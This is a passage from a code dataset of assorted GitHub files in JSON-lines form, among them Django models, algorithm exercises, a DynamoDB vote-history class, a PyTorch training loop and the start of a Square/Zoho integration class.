test_store.register_processor(mock, sup)\n test_store.process(2, type_hint=sub)\n mock.assert_called_once_with(2)\n\n test_store.clear()\n mock.reset_mock()\n if mode == \"provider\":\n test_store.register_provider(sub, mock)\n assert test_store.provide(sup) is None\n else:\n test_store.register_processor(sub, mock)\n test_store.process(2, type_hint=sup)\n mock.assert_not_called()\n","repo_name":"pyapp-kit/in-n-out","sub_path":"tests/test_type_support.py","file_name":"test_type_support.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"32407682377","text":"import sys\ninput = sys.stdin.readline\n\ndef solution(n, comp):\n\tstack = []\n\ts = \"\"\n\tidx = 0\n\tfor i in range(1, n+1):\n\t\tstack.append(i)\n\t\ts += \"+\\n\"\n\t\twhile stack and stack[-1] == comp[idx]:\n\t\t\tstack.pop()\n\t\t\ts += \"-\\n\"\n\t\t\tidx += 1\n\t\t\t\n\tif stack:\n\t\ts = \"NO\"\n\treturn s\n\n# ==========================================================\n# best time\n# more simple logic\ninput2 = sys.stdin.read\n\ndef sol1874():\n n, *nums = map(int, input2().split())\n cur = 1\n st = []\n answer = []\n for num in nums:\n while cur <= num:\n st.append(cur)\n answer.append('+')\n cur += 1\n if st[-1] != num:\n answer = ['NO']\n break\n st.pop()\n answer.append('-')\n print('\\n'.join(answer))\n\nif __name__ == \"__main__\":\n\tn = int(input())\n\tans = []\n\tfor _ in range(n):\n\t\tans.append(int(input()))\n\tprint(solution(n, ans))\n\t# sol1874()\n\t","repo_name":"kim-mg/algorithm","sub_path":"baekjoon/11 stack/stack_sequence_1874.py","file_name":"stack_sequence_1874.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6182861742","text":"import pytz as pytz\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.db.models.signals import post_save, post_delete\nfrom django.dispatch import receiver\nimport datetime\n\n\nclass League(models.Model):\n league_name = models.CharField(max_length=50, default='')\n\n class Meta:\n verbose_name = \"League\"\n verbose_name_plural = \"Leagues\"\n\n def clean(self):\n if League.objects.filter(league_name=self.league_name).exists():\n raise ValidationError(\"Error: This league exist.\")\n\n def __str__(self):\n return str(self.league_name)\n\n\nclass Team(models.Model):\n team_name = models.CharField(max_length=50)\n stadium_name = models.CharField(max_length=50)\n coach_name = models.CharField(max_length=50)\n creation_date = models.DateField(null=True)\n game_played = models.PositiveIntegerField(default=0)\n number_of_goals_diffrence = models.IntegerField(default=0)\n number_of_points = models.PositiveIntegerField(default=0)\n league_name = models.ForeignKey(League, on_delete=models.CASCADE, default='')\n add_by = models.CharField(max_length=50)\n\n def clean(self):\n if Team.objects.filter(team_name=self.team_name).exists():\n raise ValidationError(\"Error: This team exist.\")\n if self.creation_date > datetime.date.today():\n raise ValidationError('Error: invalid date.')\n\n class Meta:\n verbose_name = \"Team\"\n verbose_name_plural = \"Teams\"\n\n def __str__(self):\n return self.team_name\n\n\n@receiver(post_save, sender=Team)\ndef create_team_statistic(instance, created, **kwargs):\n if created:\n TeamStatistic.objects.create(team_name=instance.team_name, number_of_points=instance.number_of_points)\n\n@receiver(post_delete, 
sender=Team)\ndef delete_player_statistic(instance, **kwargs):\n TeamStatistic.objects.filter(team_name=instance.team_name).delete()\n\nclass Player(models.Model):\n PLAYER_POSITION = [\n ('GK', 'Goalkeeper'),\n ('CB', 'Defender'),\n ('CM', 'Midfielder'),\n ('ST', 'Striker'),\n ]\n first_name = models.CharField(max_length=50, default='')\n last_name = models.CharField(max_length=50, default='')\n player_position = models.CharField(max_length=10, choices=PLAYER_POSITION, default='')\n country = models.CharField(max_length=50, choices=pytz.country_names.items(), blank=True, default='')\n number_of_goals = models.PositiveIntegerField(default=0)\n team = models.ForeignKey(Team, on_delete=models.CASCADE, default='')\n link = \"Edit\"\n\n class Meta:\n verbose_name = \"Player\"\n verbose_name_plural = \"Players\"\n\n def __str__(self):\n return str(self.first_name) + ' ' + str(self.last_name)\n\n@receiver(post_delete, sender=Player)\ndef delete_player_statistic(instance, **kwargs):\n PlayerStatistic.objects.filter(pk=instance.pk).delete()\n\n\nclass Match(models.Model):\n home_team = models.ForeignKey(Team, on_delete=models.CASCADE, related_name='home_team')\n away_team = models.ForeignKey(Team, on_delete=models.CASCADE, related_name='away_team')\n match_date = models.DateTimeField(null=True)\n queue_number = models.PositiveIntegerField()\n home_team_goals = models.PositiveIntegerField(default='0')\n away_team_goals = models.PositiveIntegerField(default='0')\n status = models.BooleanField(default=False)\n\n def clean(self):\n if self.home_team == self.away_team:\n raise ValidationError(\"Error: Two teams with the same name.\")\n\n class Meta:\n verbose_name = \"Match\"\n verbose_name_plural = \"Matches\"\n\n def __str__(self):\n return str(self.home_team) + \" vs \" + str(self.away_team)\n\n\nclass PlayerStatistic(models.Model):\n PLAYER_CARD = [\n ('--', '------'),\n ('YE', 'Yellow'),\n ('RE', 'Red'),\n ]\n player = models.ForeignKey(Player, on_delete=models.CASCADE, default='')\n match = models.ForeignKey(Match, on_delete=models.CASCADE, default='')\n team_name = models.CharField(max_length=50, blank=True, default='')\n number_of_goals = models.PositiveIntegerField(default=0)\n number_of_assists = models.PositiveIntegerField(default=0)\n number_of_fouls = models.PositiveIntegerField(default=0)\n card = models.CharField(max_length=10, choices=PLAYER_CARD, default='')\n\n class Meta:\n verbose_name = \"PlayerStatistic\"\n verbose_name_plural = \"PlayerStatistics\"\n\n def __str__(self):\n return str(self.card)\n\n\nclass TeamStatistic(models.Model):\n team_name = models.CharField(max_length=50, blank=True, default='')\n game_played = models.PositiveIntegerField(default=0)\n number_of_win = models.PositiveIntegerField(default=0)\n number_of_draw = models.PositiveIntegerField(default=0)\n number_of_losses = models.PositiveIntegerField(default=0)\n number_of_goals_for = models.PositiveIntegerField(default=0)\n number_of_goals_against = models.PositiveIntegerField(default=0)\n number_of_goals_diffrence = models.IntegerField(default=0)\n number_of_points = models.PositiveIntegerField(default=0)\n\n class Meta:\n verbose_name = \"TeamStatistic\"\n verbose_name_plural = \"TeamStatistics\"\n\n\nclass StaticItems(models.Model):\n main_background_image = models.ImageField(blank=True, null=True)\n contact_us_background_image = models.ImageField(blank=True, null=True)\n link = \"Edit\"\n\n class Meta:\n verbose_name = \"StaticItem\"\n verbose_name_plural = \"StaticItems\"\n\n\nclass Search(models.Model):\n 
address = models.CharField(max_length=50, blank=True, default='')\n\n def __str__(self):\n return self.address\n","repo_name":"kubasmsjk/SneakyPitch","sub_path":"GamePLAY/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25519735687","text":"\nwith open(\"input.txt\", \"r\") as file:\n entries = [int(entry) for entry in file]\n entries = sorted(entries)\n print(entries)\n\ndef adapter(jolts):\n one = 1\n two = 0\n three = 1\n for i in range(len(jolts) - 1):\n diff = jolts[i+1] - jolts[i]\n if diff == 1:\n one = one + 1\n elif diff == 2:\n two = two + 1\n elif diff == 3:\n three = three + 1\n return(one*three)\n\nprint(adapter(entries))\n","repo_name":"mcookhome/advent2020","sub_path":"day10/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10987392605","text":"from classes import RocketBoard\ndef search_for_winning_rocket():\n altitudeList = []\n for rocket in board.rockets:\n altitudeList.append(rocket.altitude)\n\n\n rocketNumber = 1\n listNumerator = 0\n for _ in range(len(altitudeList)):\n if altitudeList[listNumerator] == max(altitudeList):\n print(\"Rocket number: \", rocketNumber, \"WON THE RACE\")\n rocketNumber += 1\n listNumerator += 1\n\n\n# (NUMBER OF ROCKETS, NUMBER OF ROUNDS)\nboard = RocketBoard(5,10)\nsearch_for_winning_rocket()\n\n\nprint(\"Length between Rocket number 1 and Rocket number 2:\", abs(RocketBoard.get_distance(board[0], board[1])))\nprint(\"Length between Rocket number 2 and Rocket number 3:\", abs(RocketBoard.get_distance(board[1], board[2])))\nprint(\"Length between Rocket number 3 and Rocket number 4:\", abs(RocketBoard.get_distance(board[2], board[3])))","repo_name":"marcinkkrk/FirstGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74582016513","text":"n = int(input())\r\narr = list(map(int, input().split()))\r\nx = []\r\nfor i in range(len(arr)):\r\n count = 0\r\n a = []\r\n for j in range(i+1, len(arr)):\r\n if abs(arr[i]-arr[j])<=1:\r\n count += 1\r\n a.append(arr[j])\r\n if count > 1:\r\n a.append(arr[i])\r\n x.append(a)\r\nfor i in x:\r\n if abs(max(i)-min(i))<=1:\r\n print()\r\nprint(x)\r\nprint(max(max(x)))\r\n# print(max(x))\r\n# n = int(input())\r\n# l = list(map(int, input().split()))\r\n# m = []\r\n# x = []\r\n# for i in range(len(l)):\r\n# [m.append(l[i:j]) for j in range(i+1, len(l))]\r\n# print(m)\r\n# for i in m:\r\n# if abs(max(i)-min(i))<=1:\r\n# print(i)\r\n# x.append(len(i))\r\n# print(max(x))","repo_name":"aryanxk02/HackerRank-Solutions","sub_path":"Problem Solving/ACM 1.py","file_name":"ACM 1.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18480761645","text":"from collections import deque\n\nclass Solution:\n def findOrder(self, numCourses: int, prerequisites: [[int]]) -> [int]:\n result = []\n \n indegree = [0] * numCourses\n for node in prerequisites:\n indegree[node[0]] += 1\n \n if 0 not in indegree:\n return []\n \n queue = deque()\n \n for i in range(len(indegree)):\n if indegree[i] == 0:\n queue.append(i)\n \n while queue:\n course = queue.popleft()\n for pre in prerequisites:\n if pre[1] == course:\n 
indegree[pre[0]] -= 1\n if indegree[pre[0]] == 0:\n queue.append(pre[0])\n \n result.append(course)\n \n return result if not any(indegree) else []","repo_name":"thydrdy/competitive_programming","sub_path":"leetcode/course schedule ii.py","file_name":"course schedule ii.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37476791009","text":"def main():\r\n\ta = 10\r\n\tb = 20\r\n\tprint(\"Initially, a is\", a, \"and b is\", b)\r\n\ta = 10\r\n\ttemp = a\r\n\ta= b\r\n\tb = temp\r\n\tprint(\"After swapping, a is\", a, \"and b is\", b)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"zubairtarif/iNeuron","sub_path":"Programming_Assingment1/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4381212600","text":"import os\nfrom decimal import Decimal\nimport boto3\nfrom boto3.dynamodb.conditions import Key\nfrom iwanttoreadmore.common import get_current_timestamp, hash_string\nfrom iwanttoreadmore.models.vote import get_topic_key\n\n\nclass VoteHistory:\n \"\"\"\n This class contains the logic for retrieving and modifying vote history data\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize a new VoteHistory object, containing a reference to the vote history DynamoDB table\n \"\"\"\n self.votes_history_table = boto3.resource(\"dynamodb\").Table(\n os.environ[\"VOTES_HISTORY_TABLE\"]\n )\n\n def add_vote_history(self, user, project, topic, ip_address):\n \"\"\"\n Add a new vote history entry\n :param user: username\n :param project: topic key\n :param topic: topic key\n :param ip_address: IP address of the user that voted\n \"\"\"\n topic_key = get_topic_key(project, topic)\n\n if not self.check_ip_voted(user, topic_key, ip_address):\n self.votes_history_table.put_item(\n Item={\n \"User\": user,\n \"TopicKey\": topic_key,\n \"VoteTimestamp\": get_current_timestamp(),\n \"IPHash\": hash_string(user + topic_key + ip_address),\n \"IPHashProject\": hash_string(user + project + ip_address),\n }\n )\n\n def get_vote_history(self, user, topic_key):\n \"\"\"\n Get the vote history for a given user and topic key\n :param user: username\n :param topic_key: topic key\n :return: sorted list of vote timestamps of the specified topic key\n \"\"\"\n votes = self.votes_history_table.query(\n IndexName=\"UserTopicKey\",\n ProjectionExpression=\"VoteTimestamp\",\n KeyConditionExpression=Key(\"User\").eq(user)\n & Key(\"Topic_Key\").eq(topic_key),\n )\n\n timestamps = [Decimal(vote[\"VoteTimestamp\"]) for vote in votes[\"Items\"]]\n return sorted(timestamps)\n\n def check_ip_voted(self, user, topic_key, ip_address):\n \"\"\"\n Check if an IP address already voted to the specified user and topic key\n :param user: username\n :param topic_key: topic key\n :param ip_address: IP address to check\n :return: False if the IP address hasn't vote for this topic yet, True otherwise\n \"\"\"\n ip_hash = hash_string(user + topic_key + ip_address)\n\n vote = self.votes_history_table.query(\n ProjectionExpression=\"IPHash\",\n KeyConditionExpression=Key(\"IPHash\").eq(ip_hash),\n )\n\n return len(vote[\"Items\"]) > 0\n\n def check_ip_voted_project(self, user, project, ip_address):\n \"\"\"\n Check if an IP address already voted to the specified user and topic key\n :param user: username\n :param project: project\n :param ip_address: IP address to check\n :return: False if the IP address 
hasn't vote for this topic yet, True otherwise\n \"\"\"\n ip_hash = hash_string(user + project + ip_address)\n\n vote = self.votes_history_table.query(\n IndexName=\"IPHashProjectIndex\",\n ProjectionExpression=\"IPHashProject\",\n KeyConditionExpression=Key(\"IPHashProject\").eq(ip_hash),\n )\n\n return len(vote[\"Items\"]) > 0\n","repo_name":"haltakov/iwanttoreadmore","sub_path":"api/iwanttoreadmore/models/vote_history.py","file_name":"vote_history.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"61"} +{"seq_id":"21385818949","text":"from odoo import fields,models,api,_\r\n\r\nclass HDTicket(models.Model):\r\n _inherit = 'helpdesk.ticket'\r\n\r\n date_and_time = fields.Datetime('Fecha y hora')\r\n order_date_and_time = fields.Datetime('Fecha y hora de pedido')\r\n jor_id = fields.Many2one(comodel_name='helpdesk.jor', string='JOR')\r\n interaction_id = fields.Many2one(comodel_name='helpdesk.interaccion', string='Interacción')\r\n solution_id = fields.Many2one(comodel_name='helpdesk.soluciones', string='Solución')\r\n store_id = fields.Many2one(comodel_name='helpdesk.tienda', string='Tienda')\r\n call_reason = fields.Many2one(comodel_name='helpdesk.motivo_llamada', string='Motivo de llamada')\r\n supervisor_id = fields.Many2one(comodel_name='helpdesk.supervisor', string='Supervisor')\r\n partner_phone = fields.Char(string='Telefono Cliente', related=\"partner_id.phone\",store=True,readonly=False)\r\n partner_mobile = fields.Char(string='Celular Cliente', related=\"partner_id.mobile\",store=True,readonly=False)\r\n week_number = fields.Selection(string='N° de semana', selection=[\r\n ('0', 'SEMANA 1'),\r\n ('1', 'SEMANA 2'),\r\n ('2', 'SEMANA 3'),\r\n ('3', 'SEMANA 4'),\r\n ('4', 'SEMANA 5'),\r\n ('5', 'SEMANA 6')\r\n ])\r\n\r\n @api.onchange('store_id')\r\n def _onchange_store_id(self):\r\n for record in self:\r\n record.supervisor_id = record.store_id.supervisor_id\r\n record.jor_id = record.store_id.jor_id","repo_name":"janaq/demo_tickets","sub_path":"rockys_helpdesk/models/helpdesk_ticket.py","file_name":"helpdesk_ticket.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36865792476","text":"from random import randint as r_int, uniform as r_unf\nimport csv\nfrom hw09t02_decorators import starting_decor, dump_to_json_dec\n\nSTRINGS_LO_LIM = 10\nSTRINGS_HI_LIM = 100\nCFT_RANGE_LO_LIM = -10\nCFT_RANGE_HI_LIM = 10\nSRC_FILE_NAME = 'tst_cft_src.csv'\nJSON_FILENAME = 'tst_out_file.json'\n\n\ndef gen_csv_rand_nums(file_name: str, tst_mode: bool = True) -> None:\n coefficients_lst = [['No', 'a', 'b', 'c', ], ]\n for i in ([0, 1, 2] if tst_mode else range(r_int(STRINGS_LO_LIM, STRINGS_HI_LIM))):\n coefficients_lst.append([\n i + 1,\n r_unf(CFT_RANGE_LO_LIM, CFT_RANGE_HI_LIM),\n r_unf(CFT_RANGE_LO_LIM, CFT_RANGE_HI_LIM),\n r_unf(CFT_RANGE_LO_LIM, CFT_RANGE_HI_LIM),\n ])\n with open(file_name, 'w', encoding='utf-8') as f_out:\n write_csv = csv.writer(f_out, dialect='excel', delimiter=';')\n write_csv.writerows(coefficients_lst)\n\n\n@starting_decor(SRC_FILE_NAME)\n@dump_to_json_dec(JSON_FILENAME)\ndef square_eq_root(a_cft: float, b_cft: float, c_cft: float) -> [float, tuple[float, float], None]:\n \"\"\"\n Finds roots of square equation\n a * x**2 + b * x + c = 0 -- common equation view\n D=b^2 - 4ac -- equation for discriminant\n x(1,2) = (-b +/- sqrt(D)) / 2a -- equations for roots\n :param a_cft: float 
-- a coefficient\n :param b_cft: float -- b coefficient\n :param c_cft: float -- c coefficient\n :return: tuple[float, float] -- two roots; float -- one root; None -- no roots\n \"\"\"\n discriminant = b_cft ** 2 - 4 * (a_cft * c_cft)\n if discriminant < 0:\n return 'No real roots'\n x1 = (-b_cft + discriminant ** 0.5) / (2 * a_cft)\n x2 = (-b_cft - discriminant ** 0.5) / (2 * a_cft)\n return x1, x2\n\n\ndef main():\n # print(square_eq_root(-1.54, 4.467, 9.188))\n gen_csv_rand_nums(SRC_FILE_NAME, tst_mode=False)\n results = square_eq_root()\n print('|{:^7}|{:^10}|{:^10}|{:^10}||{:^20}|'.format(*results[0]))\n print('-' * 64)\n for row in results[1:]:\n print('|{:^7}|{:<10}|{:<10}|{:<10}||{:^20}|'.format(*map(\n lambda x: x if isinstance(x, str) else str((round(x[0], 3), round(x[1], 3)))\n if isinstance(x, tuple) else str(round(x, 3)), row)))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"BeliaevAndrey/Python-II-Homeworks","sub_path":"homework_09/hw09_task02/hw09_task02.py","file_name":"hw09_task02.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23587791201","text":"import operator\nt = int(input())\n\nfor i in range(t):\n s = input().split(\" \")\n ac = int(s[0])\n aj = int(s[1])\n\n activities = []\n ctot = 0\n jtot = 0\n\n for _ in range(ac):\n s = input().split(\" \")\n start = int(s[0])\n end = int(s[1])\n activities.append((start, end, \"cameron\"))\n ctot+=end-start\n\n for _ in range(aj):\n s = input().split(\" \")\n start = int(s[0])\n end = int(s[1])\n activities.append((start, end, \"jamie\"))\n jtot+=end-start\n\n activities.sort(key=operator.itemgetter(0))\n\n cgaps=[]\n jgaps=[]\n\n\n for j in range(len(activities)):\n current = activities[j]\n adjacent = activities[(j+1)%len(activities)]\n if current[2] == \"cameron\" and adjacent[2]==\"cameron\":\n cgaps.append((adjacent[0]-current[1])%(60*24)) \n if current[2] == \"jamie\" and adjacent[2]==\"jamie\":\n jgaps.append((adjacent[0]-current[1])%(60*24))\n\n cgaps.sort()\n jgaps.sort()\n\n cskip=0\n jskip=0\n\n while cgaps and ctot+cgaps[0] <= 720:\n ctot+=cgaps[0]\n cgaps.pop(0)\n cskip+=1\n while jgaps and jtot+jgaps[0] <= 720:\n jtot+=jgaps[0]\n jgaps.pop(0)\n jskip+=1\n\n\n swaps = 0\n for j in range(len(activities)):\n current = activities[j]\n adjacent = activities[(j+1)%len(activities)]\n if current[2] == \"cameron\" and adjacent[2]==\"cameron\":\n if cskip > 0:\n cskip-=1\n else:\n swaps+=2\n elif current[2] == \"jamie\" and adjacent[2]==\"jamie\":\n if jskip > 0:\n jskip-=1\n else:\n swaps+=2\n else:\n swaps+=1\n\n print(\"Case #{}: {}\".format(i+1, swaps))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_210/38.py","file_name":"38.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69986872194","text":"import sys\n\n\ndef are_unexplored_edges(ue):\n flag = False\n for u in ue:\n if ue[u]:\n flag = True\n return flag\n\n\ndef random_walk(start, al, ue):\n # cyclic walk\n cycle = [start]\n v = start\n while True:\n u = cycle[-1]\n for i in range(len(al[u])):\n if i in ue[u]:\n v = al[u][i]\n ue[u].remove(i)\n cycle.append(v)\n break\n if v == start:\n break\n return cycle\n\n\ndef eulerian_cycle(adj_list):\n start = min(adj_list.keys())\n unexplored_edges = {u: set(range(len(adj_list[u]))) for u in adj_list}\n # initial cycle\n cycle = random_walk(start, adj_list, 
unexplored_edges)\n while are_unexplored_edges(unexplored_edges):\n for i in range(len(cycle)):\n u = cycle[i]\n if unexplored_edges[u]:\n start = u\n new_cycle = random_walk(start, adj_list, unexplored_edges)\n cycle = cycle[:i] + new_cycle + cycle[i+1:]\n return cycle\n\n\ndef main():\n adj_list = dict()\n for line in sys.stdin:\n line = line.strip()\n tail, head = line.split(' -> ')\n adj_list[int(tail)] = list(map(int, head.split(',')))\n cycle = eulerian_cycle(adj_list)\n print('->'.join(map(str, cycle)))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Leoberium/BA","sub_path":"Chapter3/BA3F.py","file_name":"BA3F.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40770814371","text":"import arduinoSerial\nimport time \ndef setupSerial():\n global arduino\n arduino=arduinoSerial.Arduino(115200,'*',0)\n\ndef run():\n while True:\n print(\"Getting Data\")\n arduino.serWrite('g')\n a =arduino.serRead()\n print(a)\n time.sleep(.5)\n\n\t\nif __name__ == \"__main__\":\n setupSerial()\n run()\n\n\n\t\n","repo_name":"sumij95/marsrover_2018","sub_path":"Temperature/serial_test.py","file_name":"serial_test.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"362454821","text":"from scopus_publication import ScopusPublication\nfrom rake_nltk import Rake\nfrom shutil import copyfile\nimport os\n\nsource_folder = ''\noutput_folder = ''\nstudies_folder = ''\n\nfor file in os.listdir(output_folder):\n if file != '.DS_Store':\n pub = ScopusPublication(output_folder, file)\n \n pub.abstract = pub.abstract.encode('ascii', 'ignore') \n if pub.abstract != '':\n keywords_file = os.path.join(output_folder, file, 'rake_keywords.txt')\n \n if not os.path.exists(keywords_file):\n try:\n r = Rake()\n r.extract_keywords_from_text(pub.abstract)\n keywords = r.get_ranked_phrases()\n \n if len(keywords) > 0:\n with open(keywords_file, 'w') as o:\n for keyword in keywords:\n o.write(keyword)\n o.write('\\n')\n except:\n pass","repo_name":"janinaj/lit-review-search","sub_path":"keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"72773416193","text":"\nimport logging\nimport torch\nimport numpy as np\nfrom tqdm import tqdm\n\nLOGGER = logging.getLogger(__name__)\n\ndef freeze_batch_norm_layers(model):\n for name, mod in model.named_modules():\n if isinstance(mod, torch.nn.BatchNorm2d):\n mod.eval()\n\n\ndef train_classification_model(model, optimizer, criterion, trainloader, device,\n verbose=True, max_batches=None, freeze_batch_norm=False):\n \n \"\"\"\n Parameters\n ----------\n device: torch.device\n Choose between cuda or cpu.\n model: torch.nn.Module\n A pytorch network model.\n optimizer: torch.optim.Optimizer\n A pytorch optimizer like Adam.\n criterion: torch.nn.Loss\n A pytorch criterion that defines the loss.\n trainloader: torch.utils.data.DataLoader\n Loader of train data.\n max_batches: int\n How many batches the model should train for.\n verbose: bool\n If True, print text - verbose mode.\n freeze_batch_norm: bool\n If True set batch norm layers to eval. 
Default: False\n\n Returns\n -------\n success: bool\n Returns False is nans encountered in the loss else True.\n \"\"\"\n model.to(device)\n model.train()\n if freeze_batch_norm:\n freeze_batch_norm_layers(model)\n\n train_loss = []\n correct = 0\n total = 0\n\n total_iterations = max_batches or len(trainloader)\n iterator = tqdm(enumerate(trainloader), total=total_iterations, position=0, leave=True, desc='train_classification') \\\n if verbose else enumerate(trainloader)\n\n for batch_idx, (inputs, targets) in iterator:\n\n inputs, targets = inputs.to(device), targets.to(device)\n optimizer.zero_grad()\n outputs = model(inputs)\n\n loss = criterion(outputs, targets)\n\n if torch.isnan(loss):\n LOGGER.warning('--> Loss is Nan.')\n break\n\n loss.backward()\n optimizer.step()\n train_loss.append(loss.item())\n\n _, predicted = outputs.max(1)\n\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n if batch_idx == max_batches:\n break\n\n acc = correct * 100.0 / total\n mean_train_loss = np.mean(train_loss)\n \n return acc, mean_train_loss\n##################################################################","repo_name":"jihyounchoi/vanilla-nerf-model-compression-using-lsa-enhanced-nncodec","sub_path":"framework/applications/utils/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23395504621","text":"import math\n\nf = open(\"C.txt\", 'w')\n\ndef ispalin(k):\n\tk = str(k)\n\tif (k == k[::-1]):\n\t\treturn True\n\treturn False\n\ndef answer(a, b):\n\tc = 0\n\tk = int(math.sqrt(a))\n\tif (k*k < a):\n\t\tk += 1\n\twhile (k*k <= b):\n\t\tif (ispalin(k) and ispalin(k*k)):\n\t\t\tc += 1\n\t\t\t#f.write(str(k))\n\t\t\t#f.write(' ')\n\t\t\t#f.write(str(k*k))\n\t\t\t#f.write('\\n')\n\t\tk += 1\n\treturn c\n\nt = int(raw_input())\nans = []\nfor i in range(0, t):\n\tr = map(int, raw_input().split())\n\tans.append(answer(r[0], r[1]))\n\nfor i in range(0, t):\n\tf.write(\"Case #\")\n\tf.write(str(i+1))\n\tf.write(\": \")\n\tf.write(str(ans[i]))\n\tf.write('\\n')","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/2700.py","file_name":"2700.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5961329417","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.utils.data import TensorDataset, Dataset\n\nfrom .active_dataset import ActiveDataset, MaskDataset\nfrom ..helpers.constants import DATA_ROOT\n\nCIFAR100_TRAIN_MEAN = (0.4914, 0.4822, 0.4465)\nCIFAR100_TRAIN_STD = (0.2023, 0.1994, 0.2010)\n\n\nclass TransformedDataset(Dataset):\n\n def __init__(self, dataset, transform=None, target_transform=None):\n self.dataset = dataset\n self.transform = transform\n self.target_transform = target_transform\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, i):\n x, y = self.dataset[i]\n if self.transform is not None:\n x = self.transform(x)\n if self.target_transform is not None:\n y = self.target_transform(x)\n return x, y\n\n\nclass CifarDataset(ActiveDataset):\n\n def __init__(self, indices, n_init=100, output_dir=None, train=True, queries_name='queries.txt', size=100):\n self.size = size\n self.init_dataset = self._get_initial_dataset(train)\n super().__init__(self.get_dataset(indices), n_init=n_init,\n output_dir=output_dir, 
queries_name=queries_name)\n\n def _get_initial_dataset(self, train=True):\n if train:\n transform = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(CIFAR100_TRAIN_MEAN, CIFAR100_TRAIN_STD)\n ])\n else:\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(CIFAR100_TRAIN_MEAN, CIFAR100_TRAIN_STD)\n ])\n if self.size == 100:\n return torchvision.datasets.CIFAR100(\n root=DATA_ROOT, train=train, transform=transform,\n target_transform=None, download=True)\n else:\n return torchvision.datasets.CIFAR10(\n root=DATA_ROOT, train=train, transform=transform,\n target_transform=None, download=True)\n\n def get_dataset(self, indices):\n return MaskDataset(self.init_dataset, indices)\n","repo_name":"kili-technology/active-learning","sub_path":"al/dataset/cifar.py","file_name":"cifar.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"29115996687","text":"class SquareZoho:\n def __init__(self, van_driver):\n self.aws = zohoapi.get_aws_token()\n self.square = zohoapi.get_s3_file(self.aws['AWS_KEY'],self.aws['SECRET_KEY'], 'square_dict2.json')\n self.square_df = json_normalize(self.square)\n self.square_df['item_id'] = self.square_df['item_id'].astype(str)\n self.zoho_token = zohoapi.get_s3_file(self.aws['AWS_KEY'],self.aws['SECRET_KEY'], 'zoho_token.json')\n self.van = van_driver\n self.vans = {\n 'mauricio':'BSPQ7V58MGQSX',\n 'oscar':'EJCQ7FPG2M4BE',\n 'isaac':'WZFB97FSPZ0MF',\n 'ely':'EW06SGK17B6DH',\n 'eduardo':'DDG5MMMHXCJSA',\n }\n self.van_id = {\n 'BSPQ7V58MGQSX': {'pwh': 1729377000000087009,'cxid': 1729377000003663083, 'whid': 1729377000062698538, 'pfix': 'MAU'},\n 'EJCQ7FPG2M4BE': {'pwh': 1729377000000087009,'cxid': 1729377000062689580, 'whid': 1729377000062698542, 'pfix': 'OSC'},\n 'WZFB97FSPZ0MF': {'pwh': 1729377000000087011,'cxid': 1729377000003663070, 'whid': 1729377000062698546, 'pfix': 'ISA'},\n 'EW06SGK17B6DH': {'pwh': 1729377000000087011,'cxid': 1729377000040623610, 'whid': 1729377000043236430, 'pfix': 'ELY'},\n 'DDG5MMMHXCJSA': {'pwh': 1729377000000087011,'cxid': 1729377000041250719, 'whid': 1729377000043236426, 'pfix': 